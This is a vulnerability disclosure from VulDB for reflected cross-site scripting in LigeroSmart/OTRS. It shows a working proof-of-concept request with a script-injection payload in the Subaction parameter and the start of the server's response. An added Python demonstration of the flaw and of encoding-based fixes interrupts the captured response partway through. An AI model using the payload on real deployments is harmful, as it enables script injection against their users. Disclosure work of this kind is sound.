Submit #749788: LigeroSmart LigeroSmart / OTRS 6.1.27 Cross-Site Scripting (XSS) – Reflected Subaction parameter

Title: LigeroSmart LigeroSmart / OTRS 6.1.27 Cross-Site Scripting (XSS) – Reflected Subaction parameter

Description: A reflected Cross-Site Scripting (XSS) vulnerability was identified in the LigeroSmart application, within the AgentDashboard functionality, in the Subaction parameter. The issue is caused by improper input validation and a lack of output encoding of the user-controlled Subaction parameter. An authenticated attacker can inject arbitrary JavaScript code, which is reflected in the HTTP response and executed in the victim's browser.

Docker was installed and tests were performed. https://github.com/LigeroSmart/docker-ligerosmart

REQUEST

POST /otrs/index.pl HTTP/1.1
Host: localhost:9090
Content-Length: 263
sec-ch-ua-platform: "Windows"
Accept-Language: pt-BR,pt;q=0.9
sec-ch-ua: "Not(A:Brand";v="8", "Chromium";v="144"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Accept: text/html, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:9090
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:9090/otrs/index.pl
Accept-Encoding: gzip, deflate, br
Cookie: OTRSAgentInterface=mGvYIUIyihthTyFtxMhNihGuC3BGLRnw
Connection: keep-alive

Action=AgentDashboard;Subaction=Element</script><script>alert(7776)</script>;Name=0130-TicketOpen;AdditionalFilter=;Filter=MyServices;CustomerID=;CustomerUserID=;SortBy=Age;OrderBy=Down;SortingColumn=Age;TabAction=1;ChallengeToken=UFfwuDve1AuIS2ehbEmyWw4pZ2qVcCeE

RESPONSE

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Disposition: filename="AgentDashboard.html"
Content-Type: text/html; charset=utf-8;
Date: Sat, 31 Jan 2026 14:08:15 GMT
Expires: Tue, 1 Jan 1980 12:00:00 GMT
Pragma: no-cache
Server: nginx
X-Frame-Options: SAMEORIGIN
X-Ua-Compatible: IE=edge,chrome=1
Content-Length: 98692

<!DOCTYPE html> <html> <!-- --> <!-- OTRS: Copyright (C) 2001-2020 OTRS AG, https://otrs.com/.
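As an added example, not code from the submission or from LigeroSmart/OTRS, the Python below models the reflection pattern the description reports and the two fixes it implies (input validation and output encoding), run against the PoC Subaction value from the request above; the template string, the parameter parser and the allow-list are assumptions.

```python
"""Added demo (not LigeroSmart/OTRS code): why a raw Subaction value breaks
out of the page, and two defences: an allow-list and output encoding."""
import html
from urllib.parse import unquote_plus

# Constructed sample modelled on the submission's PoC body; OTRS-style
# index.pl requests separate parameters with ';'.
POC_BODY = ("Action=AgentDashboard;"
            "Subaction=Element</script><script>alert(7776)</script>;"
            "Name=0130-TicketOpen;TabAction=1")

# Hypothetical allow-list: "Element" is the only dashboard Subaction seen on
# this page; a real fix lists every value the module actually dispatches on.
ALLOWED_SUBACTIONS = {"", "Element"}


def parse_params(body: str) -> dict:
    """Split a ';'-separated form body into a dict; the first value wins."""
    params = {}
    for pair in body.split(";"):
        if "=" in pair:
            key, value = pair.split("=", 1)
            params.setdefault(unquote_plus(key), unquote_plus(value))
    return params


def render_vulnerable(subaction: str) -> str:
    """Hypothetical template that interpolates the raw value (the defect)."""
    return f"<script>var Subaction = '{subaction}';</script>"


def render_encoded(subaction: str) -> str:
    """Same template with HTML entity encoding: '<' becomes '&lt;', so the
    browser's HTML parser never sees a second <script> tag."""
    return f"<script>var Subaction = '{html.escape(subaction, quote=True)}';</script>"


def validate_subaction(subaction: str) -> bool:
    """Input validation: dispatch only on values the module knows."""
    return subaction in ALLOWED_SUBACTIONS


def count_script_tags(page: str) -> int:
    """How many <script> openings the HTML parser will see in the response."""
    return page.lower().count("<script")


if __name__ == "__main__":
    sub = parse_params(POC_BODY)["Subaction"]
    print("allow-list accepts PoC value:", validate_subaction(sub))                  # False
    print("script tags, raw reflection:", count_script_tags(render_vulnerable(sub)))  # 2
    print("script tags, encoded       :", count_script_tags(render_encoded(sub)))     # 1
```

The allow-list stops the request at dispatch time; the encoding is the defence in depth that holds even for values the allow-list is later extended to accept.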
Source: https://github.com/LigeroSmart/ligerosmart/issues/284
User: Samara Gama - igobysamy (UID 81801)
Submission: 01/31/2026 15:16
Moderation: 02/15/2026 17:00 (15 days later)
Status: Accepted
VulDB entry: 346156 [LigeroSmart up to 6.1.26 /otrs/index.pl AgentDashboard Subaction cross site scripting]
Points: 20
